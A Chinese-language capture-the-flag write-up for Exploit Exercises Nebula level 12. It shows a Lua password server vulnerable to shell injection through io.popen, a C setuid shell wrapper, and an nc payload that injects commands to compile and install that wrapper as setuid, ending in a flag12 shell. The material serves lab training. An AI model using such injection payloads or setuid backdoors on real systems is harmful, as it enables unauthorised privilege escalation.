ExploitExercises_Nebula_Level12
来源:互联网 发布:淘宝直通车黑车技术 编辑:程序博客网 时间:2024/06/05 16:31
程序源码为lua脚本:
local socket = require("socket")local server = assert(socket.bind("127.0.0.1", 50001))function hash(password) prog = io.popen("echo "..password.." | sha1sum", "r") data = prog:read("*all") prog:close() data = string.sub(data, 1, 40) return dataendwhile 1 do local client = server:accept() client:send("Password: ") client:settimeout(60) local line, err = client:receive() if not err then print("trying " .. line) -- log from where ;\ local h = hash(line) if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then client:send("Better luck next time\n"); else client:send("Congrats, your token is 413**CARRIER LOST**\n") end end client:close()end可以对password进行注入:
1. 在/tmp目录下创建shell.c:
#include <stdlib.h>#include <unistd.h>#include <sys/types.h>#include <stdio.h>int main(int argc, char **argv, char **envp){ gid_t gid; uid_t uid; gid = getegid(); uid = geteuid(); setresgid(gid, gid, gid); setresuid(uid, uid, uid); system("/bin/bash");}2. 参数注入:
level12@nebula:/tmp$ nc localhost 50001Password: 1; gcc -o /tmp/shell /tmp/shell.c; cp /tmp/shell /home/flag12; chmod +s /home/flag12/shell echo 1
3. 然后运行/home/flag12/shell即可:
level12@nebula:/tmp$ cd /home/flag12level12@nebula:/home/flag12$ ls -ltotal 9-rw-r--r-- 1 root root 685 2011-11-20 21:22 flag12.lua-rwsr-sr-x 1 flag12 flag12 7321 2016-12-29 19:54 shelllevel12@nebula:/home/flag12$ dateThu Dec 29 19:55:36 PST 2016level12@nebula:/home/flag12$ ./shell flag12@nebula:/home/flag12$
0 0